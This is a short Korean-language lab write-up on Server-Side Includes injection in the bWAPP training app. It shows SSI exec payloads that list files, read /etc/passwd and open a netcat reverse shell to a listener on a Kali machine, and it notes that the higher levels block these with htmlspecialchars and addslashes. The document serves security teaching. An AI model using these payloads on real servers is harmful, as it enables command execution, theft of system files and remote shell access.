bWAPP 11. Server-Side Includes (SSI) Injection

                                           Server-Side Includes (SSI) Injection

 

Server-Side Includes (SSI) Injection

SSI(Server-Side Includes)는 웹페이지 내에서 주로 방문자 수를 세거나 홈페이지의 로고를 수정하는 간단한 기능을 추가할 때 사용됩니다.

 

- Low 레벨 -

 

First name과 Last name이 존재하는 것을 확인

값을 입력하면 ssi.shtml 페이지를 호출하는데 SSI 기능을 사용한다는 사실이 확인가능하다.

자신의 ip를 출력해주는것을 확인할 수 있다.

 

vi ssii.php

ssii.php를 참조하고있으므로 해당 php의 소스코드를 봤다.

따로 필터링은 존재하지않고 있다.

 

 

 

 

 

 

 

- Low 레벨 결과 및 입력 값 1 -

 

 

<!--#exec cmd="ls" -->

 

 

ls 명령어가 출력되는 것을 확인이 가능하다.

 

 

 

- Low 레벨 결과 및 입력 값 2 -

 

 

<!--#exec cmd="cat /etc/passwd"-->

 

 /etc/passwd를 성공시켰다.

 

 

 

 

 

- Low 레벨 결과 및 입력 값 3 -

 

<!--#exec cmd="nc 192.168.1.82 7777 -e /bin/bash"

이번에도 netcat을 활용하여 쉘을 획득하여보자

 

[ 공격자 ]

 

nc -lvp 7777

칼리에서 쉘을 획득할 수 있었으며, ssi injection에 성공하였다.

 

 

 

 

- Medium 레벨과 High 레벨 -

 

vi functions_external.php

 

xss_check_ 3와 xss_check_ 4 에서는

htmlspecialchars 함수와 addslashes함수를 이용하여, 대응 하는 것을 확인할 수 있습니다.